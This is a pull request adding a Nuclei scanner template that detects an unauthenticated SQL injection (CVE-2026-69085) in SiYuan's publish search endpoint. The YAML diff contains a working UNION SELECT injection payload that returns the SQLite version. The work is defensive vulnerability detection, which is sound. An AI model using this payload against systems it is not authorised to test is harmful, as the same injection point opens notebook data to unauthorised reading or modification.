### PR TITLE
Add CVE-2026-69085 behavioral SQL injection template

### DIFF
--- a/http/cves/2026/CVE-2026-69085.yaml
+++ b/http/cves/2026/CVE-2026-69085.yaml
@@ -1,0 +1,69 @@
+id: CVE-2026-69085
+
+info:
+  name: SiYuan <=3.7.2 - Unauthenticated SQL Injection in Publish Search
+  author: str4k3r
+  severity: critical
+  description: |
+    SiYuan versions through 3.7.2 concatenate the publish searchDocs keyword
+    into a SQLite query. When Publish.Auth.Enable is false, the publish HTTP
+    service exposes the endpoint without a token. This read-only detector asks
+    SQLite for its own version through a UNION expression and does not read or
+    modify notebook content.
+  impact: An unauthenticated attacker may read or modify cleartext notebook data through the publish search surface.
+  remediation: Upgrade SiYuan to 3.7.3 or later, or disable the publish service.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-69085
+    - https://github.com/siyuan-note/siyuan/security/advisories/GHSA-33jq-p8c2-q3q4
+    - https://github.com/siyuan-note/siyuan/releases/tag/v3.7.3
+    - https://hub.docker.com/r/b3log/siyuan/tags
+  classification:
+    cve-id: CVE-2026-69085
+    cwe-id: CWE-89
+    cvss-score: 10.0
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
+  metadata:
+    verified: true
+    verification_status: VERIFIED
+    artifact_scope: DEPLOYABLE
+    max-request: 2
+    technology: SiYuan
+    vendor: b3log
+    product: siyuan
+    safe_oracle: read-only sqlite_version marker from a UNION SELECT
+  tags: cve,cve2026,siyuan,sqli,sqlite,cwe89,unauth
+
+http:
+  - raw:
+      - |
+        POST /api/notebook/lsNotebooks HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {}
+
+      - |
+        POST /api/filetree/searchDocs HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"k":"poc%')/**/union/**/select/**/'poc','','poc','','{{box_id}}',sqlite_version(),'/POC','POC','','','','','','',0,'d','','',0,'','',0--"}
+
+    extractors:
+      - type: regex
+        name: box_id
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - '"id":"([0-9]{14}-[a-z0-9]{7})"[^}]*"closed":false'
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: regex
+        part: body
+        regex:
+          - '"path":"[0-9]+\.[0-9]+\.[0-9]+"'


### PR DESCRIPTION
## Summary

Adds a behavioral detector for CVE-2026-69085, the unauthenticated SQL injection in SiYuan `searchDocs` through v3.7.2. The endpoint concatenates the search keyword into the SQLite query; v3.7.3 parameterizes the search path.

## Detection

The template first obtains an open notebook identifier, then sends a single read-only `UNION SELECT sqlite_version()` probe. It matches the injected SQLite version-shaped `path` response. The probe does not stack statements, read notebook content, use credentials, or modify application data.

## Validation

- Official SiYuan v3.7.2 vulnerable image: DETECTED 3/3
- Official SiYuan v3.7.3 fixed image: NOT DETECTED 3/3
- Native Nuclei v3.11.0 validation: passed
- Read-only oracle: SQLite version marker only

## References

- https://github.com/siyuan-note/siyuan/security/advisories/GHSA-33jq-p8c2-q3q4
- https://nvd.nist.gov/vuln/detail/CVE-2026-69085
- https://github.com/siyuan-note/siyuan/releases/tag/v3.7.3